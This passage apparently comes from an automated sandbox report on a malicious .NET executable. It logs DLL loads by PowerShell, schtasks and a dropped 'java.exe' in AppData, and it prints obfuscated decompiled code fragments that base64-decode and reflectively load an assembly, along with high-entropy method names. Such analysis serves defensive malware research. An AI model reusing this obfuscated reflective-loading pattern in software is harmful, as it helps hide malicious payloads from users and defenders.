                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: java.lnk.0.drLNK file: ..\..\..\..\..\java.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt._4bsK7RucmrV6WdjtjwArUiADXQuweRfXmix2RxjDnCBmlPnc2qwJ,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.bcnnRDXz7xSOfGx7U70JmxYRijsQDOE5vDBiollclBFMPOXGlpbo,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.S2SNlsqEExtrK68xhuYoBGDuqP2MGB29k3cn5XU84AFDozqUw2pi,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.p6zwrAdeQTwpb5oxJvVBAmcxvdkXv4kG0yuV9gVsZm6cEKFxDfC7,gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.KmhMex9YyAfS6AOatebnkcmwSCGWRPRS5Vvs3U6kARFb9SEd9bQob4QtxuBFATr5QsJevR()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2],gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.eZ2Yx9fmSDDM(Convert.FromBase64String(A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt._4bsK7RucmrV6WdjtjwArUiADXQuweRfXmix2RxjDnCBmlPnc2qwJ,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.bcnnRDXz7xSOfGx7U70JmxYRijsQDOE5vDBiollclBFMPOXGlpbo,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.S2SNlsqEExtrK68xhuYoBGDuqP2MGB29k3cn5XU84AFDozqUw2pi,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.p6zwrAdeQTwpb5oxJvVBAmcxvdkXv4kG0yuV9gVsZm6cEKFxDfC7,gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.KmhMex9YyAfS6AOatebnkcmwSCGWRPRS5Vvs3U6kARFb9SEd9bQob4QtxuBFATr5QsJevR()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2],gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.eZ2Yx9fmSDDM(Convert.FromBase64String(A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO System.AppDomain.Load(byte[])
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5 System.AppDomain.Load(byte[])
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO System.AppDomain.Load(byte[])
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5 System.AppDomain.Load(byte[])
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD34825830 push esp; retf 0_2_00007FFD34825939
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD34819AF2 push 8B48FFFFh; retf 0_2_00007FFD34819AF7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346ED2A5 pushad ; iretd 2_2_00007FFD346ED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD346DD2A5 pushad ; iretd 6_2_00007FFD346DD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3470D2A5 pushad ; iretd 10_2_00007FFD3470D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348F2A60 pushad ; ret 10_2_00007FFD348F2A61
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD346FD2A5 pushad ; iretd 16_2_00007FFD346FD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD3481BC9D push E859A9D5h; ret 16_2_00007FFD3481BCF9
                      Source: file.exe, M3ptmYTEMWAB.csHigh entropy of concatenated method names: 'gp0YsiynZN2g', 'ZJeDT3GM4FAI', '_7RXI3dHEz7cY', 'jwSgEdSdtxBDkHM8doDYT2bm5wCvFBHIdV2xbZ9TQjsw', 'jrJxF4cshpRI5Jun2fE5xY8S6QQAHqcQU11Dqxol8Wwf', 'wUzLfYEtJE2o8tmDDRhMKhyfIIn3zHpzATS9GY44DThY', '_6X5HbTHT6YTncQjrKAJT7QY1YlQ5kWZEVcl1OkUmmjrb', 's3BR8naHMaxJjtvjNvTB2fpMnGdxdr0REsW5sCeIr2ik', 'b4h4aINGFxClKY152GZbLLHupdHRclxMmM9S8qiHd6H3', 'WpGAqzJgyR8tM5zIqHl2NFbB8nT1hupH2mZtYTt00XTT'
                      Source: file.exe, oUSjexChAppVeZ0ssdAFPwDkWXxbab01CmKmwzOxDTQlROrDuiAXIY2FlLivid05l5gtq3bsePKqC8j1SD69.csHigh entropy of concatenated method names: 'eoIbG65tXTLI1ovgnEYFVlPFGOxpb7IyOBvRHsYTcyoFep1lotqAP6nJQx9pYEjusVXbqUYKFfHMenpI6vj7', 'vwbRRbp0DPbuNeBPC6SJVcHxG74TUCpFzBwNBpvmM1H9i2KpusikL3PDc5G9gVwn4VdRGyJ4fwtuD6YrJKeG', 'PH3IN4pJQQEwMJwsgExia9LLbq8hQf2Iitut38JpCaXP9HaDNATxVUsVntMSUhEWToHt6F7uZYsmxUrqX9QE', 'FsjMtX6CksBD2fQTbpR0J456l0kFaBaTWqlWtDJWiQRgUsgQgE7P9Ez95OhGBYKB2PGKyp5JMZPScEOULCTS', 'QRscHXwe6naR533Itv72zUYuxOYGrl2X10cDAlSml7MhhijZDK4F1rZa6pHS0WuH4F5hX7o32WfGjxnqreY0', '_37nVgjyftjav8fqppob1umrDaEEXTt6GZaMeVC9eFlAxfdt1kshibFSjaHkP514cLlQQY6AxxrPuxEFR23R0', 'CXpwLISPdlzvt4WhUoQJdfnjEXHAzgILstaFvcPLRZ5sRF9rlQ7caHAkWnvXezskl7YKaE', 'zUgsPnV0pMXQQYBPlYTY9vcydeeLOQZ8T0BTRWzjPKDj24S4kC9eryHJj0FZkof8Br2SeG', 'giWTIEtPY6s2TTMdElhcIfHznwL2iB3SIG6FnQnUgJNbkOcZWVp2w4av34TF3TzyW1xmVe', 'Kj9AsEKucDvkEFi3gLYQ99e0qUwbF4IVYNf1edNU5TIRYjVIcAN7xXF3ASiM0w3IzKwNNK'
                      Source: file.exe, Y8h7ekJtf53H0CKI3TPYR0r2hfbocajvKPfw7qmK0mHFfSEcPGyNpfuNYvlDLId5P2lOvgFAbFGDEZNnyBYT.csHigh entropy of concatenated method names: 'adu2aADrBuccvNNVVqSYZvpM0CI2bK65BDDOkJuGc5u5TETvDmdYiD3dcJK1VjB7LJ62egwZ8d9nxOnH5P6I', 'DbokZYNxK5jo', 'zL0WYwWebm6Q', 'zpZDpsxeCjZN', 'hP7bv425jNx5'
                      Source: file.exe, DljV7yiUkhCKNzMv1XVMfbgUlqgzoInv7AwX78o2Ex4GkkReKlme.csHigh entropy of concatenated method names: 'jAq1IF3ddT6yLauHMQ9ulW51GahEKkZAp4wltElr9cQr5An5kUG9', '_9dEOpkJ3Dq8oShOesEd8DvQBAmaB11hTtRYMZX6Qm85LOYtDQ7i0', 'ap5p6bw8wLI8kV5xzdq6OYf49TXs5f2suYKNxw72BJuNp8kVjt4B', 'Jwk1cSMp1N9sOoPX59MQWyTdK2nsCi7UQAkeAqrfQ0BMeG1DQYTi', 'cdArGSxxIWGJLRYD0ScTXdLdPOhKxFZkewXOJRCFXcXKGZyER9bi', 'XiI0IghF6vkESZYqvtufVUoxLSa0pIYGT7MFefCGPL4pHTip8mu5', 'EoTFQxammhuLUBJkjVlCLWt65An0Iq7bvsl1Gl2Jd8rl6e9HuLg8', '_0qMZZNLpRow6uB439hJQ6N1EIVRFUcH8xsu70SXMQQ9RetyY9xEp', 'VQ7oGuif7XZxSBgryQEvLrLklrrx0aFadkeXNgEHbfOHizH7fCgW', 'f8pAdl1TaVWhlXDJZAcYACtV8KE9H2PQ7ePcEq9Zz7NFywyIHVnJ'
                      Source: file.exe, TnkVrkY3pzpsXLvpbg5h5iy5VedjuwVFGSS6BCERLvB8fB5fbBpZFY98GKSp1zkmVAig0QbcPhKpZOpXoewG.csHigh entropy of concatenated method names: 'lxsRUalp7Sg5NhoGnEPHunq7XaYydqXMfFzAsCoIPDCzcrBEiEa4VNxrpAbMhXtEp2BOgvWkXKVnHNdlNRI1', 'SbUogYgk7G6CW6vGOrYzdCjVbMnhnLCzT3u5RU7ibqiSWQHTB98jA4jou9LEaNOHevryJspyWJqcpPl2lFNb', 'yY9DHJDJQDPXjZOYzR2Owk5tEhhjovURDE47VcpN25uQPhYERvrpwl3aXbgsSlaatGRlNT5LXdH98l2Azuoh', 'GjyMXiI0TqDZ', '_5pe4xfICrp8h', 'AbR7Qp6SydzU', '_4zkxFCAzc82D', 'F62mTq12pG2X', 'nKMUxWyYhUK9', 'CgofFNSWMm9s'
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.csHigh entropy of concatenated method names: 'IHQS8QYOd9moTDSEanN1sjHTnpWeVVazAJmyR9eXcJg22lwl2vE8', 'zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO', 'cNG5tRkwJTR1ownoIngSH7wBj8bt7IRyOUY9vaZXQLTuS2bXnPHQ', 'Br5UcZpabKJNZniYHTkCKnrvNKecH9pu1ObE2kgcIm0LwOIZstUm', '_1XkoJBGYXI6Z5TAuHXWFwe05mpfAG86pKq3f5qWypCZiKa9AKaOA', 'wys04OiEHyhSCtRbRseGjbugPF7ntCeFw0li8k7sJRhikp9BNBhpjMvIueNt5OPD1TdzFUfdv7X9kSAsiTRr', '_8gJipHAkBOqFIWaBgGBlKaW0AmEicjychUwFToOPojJWifOGQkH8S8Eg8nKD1zbCIJztDwru95y4B72UbmvO', '_2rbEPVG6nb4uL4UdI1gmoLv4qa8i3dmTxMOrxQTkScGFm6UmrRsQRMlUmzj8kSrxqjNEjzS0slfXAFfWWwcn', 'uL1DwVlYMUkTdnhwnmAnaqk0tt6mayGu1ElOOdpSpuRwHa7BetGSQvHbsyH7BnrCgRzM8tAhbcAEMZzSZgbV', 'Fa7heNWSiOMFvASfglCx9UqGjkwzm7pMdqK9RS7xVOCZbiMmKjab3hMRz0tT792MRNSD7TJ5EiEAOwT3ZpIn'
                      Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csHigh entropy of concatenated method names: '_0sZQYedQljFSbXXuOyuPxQdGKQELj0m0REObc239KzIUZYGFf8ji5CEhsB9mIjAddO3ohy', 'BoHDOoCcD96rKe1oXlAqYjRFAk0e6ec6EPHPZRhV0073w7ZsAmJ344EEwcvWomFToSvgGQ', 'GpBfp25jiKTpysZ8XZxqlnl6JGyhJouJZxiVO27sSSfNWyWreFw1TGubxx0XPZiuVqxIVw', 'TStr6eh2tebBwJcgyoRwvx7j2JeAoS8V2KRIGrRtfb2mBuegLPYnVhtGR8aR7xSVZedbu3', 'H4XDsSzLbdVnNJNuAicSH4sSiDVURiJiznnTy4I7V6d2QlycoWNrnMXzFIqGohSlLouYBl', 'hVsQkBRc0RNdXppjpR6d5e7aV8pXHXKLMIhwTZN0nP6m9Kq4KEwRLaKrf7n4Vig6INZC3A', 'BXnUn5K2xegL2grzQdkWolfQgjEcKm5rIyJ1CTbA4INmuTpelc6uihWmvOSKEHg9V1emDt', 'hrQJ8hfahL8zJzaOiYNo1ikssYmRGBdaX2uXlntMxnrjvOME4uj4qAqywRiqcCT5LPdKmh', 'Id2EO9nStfroOxv9GFmQk4t4x3K2Na4glKwMgpE7ebwcj54DStsQRul4M5E6PdMMt5fXl8', 'BxXFvzqTQ3Pkl8o8oA2wA3Ullqj3oMLgFJwMj8qcOWXModCyuxpSas54zQhD8pX2nztdKw'
                      Source: file.exe, Cqf5ySADqnBBZJSGBs6XL0JHhzclJSTcTFxQnT47pV9tLeSqr21xtsUx8EfmB3gZ47HrV3.csHigh entropy of concatenated method names: 'RqwE2GFuZfPUcJIcLBq3XX4TWcKN4NeBcC3owGqrsHgnPg8fcDMT2FTM9u1BPz1gWVKCDD', 'LwgBdoAJo6UU7T6dX82c19OKryiQHMZMkjG5iR5wKHkDuWH9J63uF0VR8pTKfHq0oHreUv', 'aHot2acFS5B8E3y8257ImU23ft1YZ14AKlcRbyr34qG9pMqHRLBWFYRSnBU33sxUNVLh2m', 'EY3Vih6tyin3ziN3AUFlzEoGl6pVfBhktI7RZapZwNVHIzaooGjR4CQwfclTcgNLdIfTNB', 'wf4G9slVDSMC', 'd4xfPfAvuBgg', 'MkVl2W4HuHga', 'vZnHyxzgm4el', 'zBnj4uHa8HGC', 'qSZb8axXCDZm'
                      Source: file.exe, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.csHigh entropy of concatenated method names: 'T6K5wpb8o6jbbx1kRkiuj8cGRFvn9UfmJ2j1BgmUx0J2PCOR4qkwF26LHswdenuZ22A2Ht', '_55GbWsfTknBQ', 'lACv4mMLFCLy', 'RJcVX7XqfS8N', 'zsv7fUUItM9C'
                      Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csHigh entropy of concatenated method names: 'ytTJeaHBMZWBiKLPVFx3poRI0l1uJwq0MUUgA8FLnqh9ETdaW7FY', 'Jx1mjn7Ud3qlURoYy7Sl2fJeczHcya1KYR2LGeW7CWXovlBOm4Rq', 'sHt8heCBFmzo5DkswFX462I6hvwWcUBpif9DL5l4kfjgbAUiV2RT', 'kBG0UhwPFOGO8FOQQ5cnkUwRUOpIylq2KodeXX1X1VG5SSnQzKhF', 'jlZa1r2qdPhVrr8uGw7G0ujhhNuI1BVuAtn25R3MKoupMxAMYEGP', 'Z1fBvyDWNF6wNdzBrOYiHjiStu6o0p6NHe7zx88ogEZrkG1Emunx', 'fINzRsqpdNko3zAGgDDZSjwe7f9smxUwQTeLosUKDlP6RlkjEy7u', 'QhsO9etZ7leq4WlTrjoU9HrouhZrSiUdFfehMlFa1nsAfjD72vWy', 'JvH9qnWkWtw7IA4fjdNRFNhtCcOyxZJE9qLaM3VnZaxk7BwUOvc6', 'uVyEk9STM7Rev1s2XkUokUU0nRPcC2LphqvF5v8wTU4wjcWcH5zy'
                      Source: java.exe.0.dr, M3ptmYTEMWAB.csHigh entropy of concatenated method names: 'gp0YsiynZN2g', 'ZJeDT3GM4FAI', '_7RXI3dHEz7cY', 'jwSgEdSdtxBDkHM8doDYT2bm5wCvFBHIdV2xbZ9TQjsw', 'jrJxF4cshpRI5Jun2fE5xY8S6QQAHqcQU11Dqxol8Wwf', 'wUzLfYEtJE2o8tmDDRhMKhyfIIn3zHpzATS9GY44DThY', '_6X5HbTHT6YTncQjrKAJT7QY1YlQ5kWZEVcl1OkUmmjrb', 's3BR8naHMaxJjtvjNvTB2fpMnGdxdr0REsW5sCeIr2ik', 'b4h4aINGFxClKY152GZbLLHupdHRclxMmM9S8qiHd6H3', 'WpGAqzJgyR8tM5zIqHl2NFbB8nT1hupH2mZtYTt00XTT'
                      Source: java.exe.0.dr, oUSjexChAppVeZ0ssdAFPwDkWXxbab01CmKmwzOxDTQlROrDuiAXIY2FlLivid05l5gtq3bsePKqC8j1SD69.csHigh entropy of concatenated method names: 'eoIbG65tXTLI1ovgnEYFVlPFGOxpb7IyOBvRHsYTcyoFep1lotqAP6nJQx9pYEjusVXbqUYKFfHMenpI6vj7', 'vwbRRbp0DPbuNeBPC6SJVcHxG74TUCpFzBwNBpvmM1H9i2KpusikL3PDc5G9gVwn4VdRGyJ4fwtuD6YrJKeG', 'PH3IN4pJQQEwMJwsgExia9LLbq8hQf2Iitut38JpCaXP9HaDNATxVUsVntMSUhEWToHt6F7uZYsmxUrqX9QE', 'FsjMtX6CksBD2fQTbpR0J456l0kFaBaTWqlWtDJWiQRgUsgQgE7P9Ez95OhGBYKB2PGKyp5JMZPScEOULCTS', 'QRscHXwe6naR533Itv72zUYuxOYGrl2X10cDAlSml7MhhijZDK4F1rZa6pHS0WuH4F5hX7o32WfGjxnqreY0', '_37nVgjyftjav8fqppob1umrDaEEXTt6GZaMeVC9eFlAxfdt1kshibFSjaHkP514cLlQQY6AxxrPuxEFR23R0', 'CXpwLISPdlzvt4WhUoQJdfnjEXHAzgILstaFvcPLRZ5sRF9rlQ7caHAkWnvXezskl7YKaE', 'zUgsPnV0pMXQQYBPlYTY9vcydeeLOQZ8T0BTRWzjPKDj24S4kC9eryHJj0FZkof8Br2SeG', 'giWTIEtPY6s2TTMdElhcIfHznwL2iB3SIG6FnQnUgJNbkOcZWVp2w4av34TF3TzyW1xmVe', 'Kj9AsEKucDvkEFi3gLYQ99e0qUwbF4IVYNf1edNU5TIRYjVIcAN7xXF3ASiM0w3IzKwNNK'
                      Source: java.exe.0.dr, Y8h7ekJtf53H0CKI3TPYR0r2hfbocajvKPfw7qmK0mHFfSEcPGyNpfuNYvlDLId5P2lOvgFAbFGDEZNnyBYT.csHigh entropy of concatenated method names: 'adu2aADrBuccvNNVVqSYZvpM0CI2bK65BDDOkJuGc5u5TETvDmdYiD3dcJK1VjB7LJ62egwZ8d9nxOnH5P6I', 'DbokZYNxK5jo', 'zL0WYwWebm6Q', 'zpZDpsxeCjZN', 'hP7bv425jNx5'
                      Source: java.exe.0.dr, DljV7yiUkhCKNzMv1XVMfbgUlqgzoInv7AwX78o2Ex4GkkReKlme.csHigh entropy of concatenated method names: 'jAq1IF3ddT6yLauHMQ9ulW51GahEKkZAp4wltElr9cQr5An5kUG9', '_9dEOpkJ3Dq8oShOesEd8DvQBAmaB11hTtRYMZX6Qm85LOYtDQ7i0', 'ap5p6bw8wLI8kV5xzdq6OYf49TXs5f2suYKNxw72BJuNp8kVjt4B', 'Jwk1cSMp1N9sOoPX59MQWyTdK2nsCi7UQAkeAqrfQ0BMeG1DQYTi', 'cdArGSxxIWGJLRYD0ScTXdLdPOhKxFZkewXOJRCFXcXKGZyER9bi', 'XiI0IghF6vkESZYqvtufVUoxLSa0pIYGT7MFefCGPL4pHTip8mu5', 'EoTFQxammhuLUBJkjVlCLWt65An0Iq7bvsl1Gl2Jd8rl6e9HuLg8', '_0qMZZNLpRow6uB439hJQ6N1EIVRFUcH8xsu70SXMQQ9RetyY9xEp', 'VQ7oGuif7XZxSBgryQEvLrLklrrx0aFadkeXNgEHbfOHizH7fCgW', 'f8pAdl1TaVWhlXDJZAcYACtV8KE9H2PQ7ePcEq9Zz7NFywyIHVnJ'
                      Source: java.exe.0.dr, TnkVrkY3pzpsXLvpbg5h5iy5VedjuwVFGSS6BCERLvB8fB5fbBpZFY98GKSp1zkmVAig0QbcPhKpZOpXoewG.csHigh entropy of concatenated method names: 'lxsRUalp7Sg5NhoGnEPHunq7XaYydqXMfFzAsCoIPDCzcrBEiEa4VNxrpAbMhXtEp2BOgvWkXKVnHNdlNRI1', 'SbUogYgk7G6CW6vGOrYzdCjVbMnhnLCzT3u5RU7ibqiSWQHTB98jA4jou9LEaNOHevryJspyWJqcpPl2lFNb', 'yY9DHJDJQDPXjZOYzR2Owk5tEhhjovURDE47VcpN25uQPhYERvrpwl3aXbgsSlaatGRlNT5LXdH98l2Azuoh', 'GjyMXiI0TqDZ', '_5pe4xfICrp8h', 'AbR7Qp6SydzU', '_4zkxFCAzc82D', 'F62mTq12pG2X', 'nKMUxWyYhUK9', 'CgofFNSWMm9s'
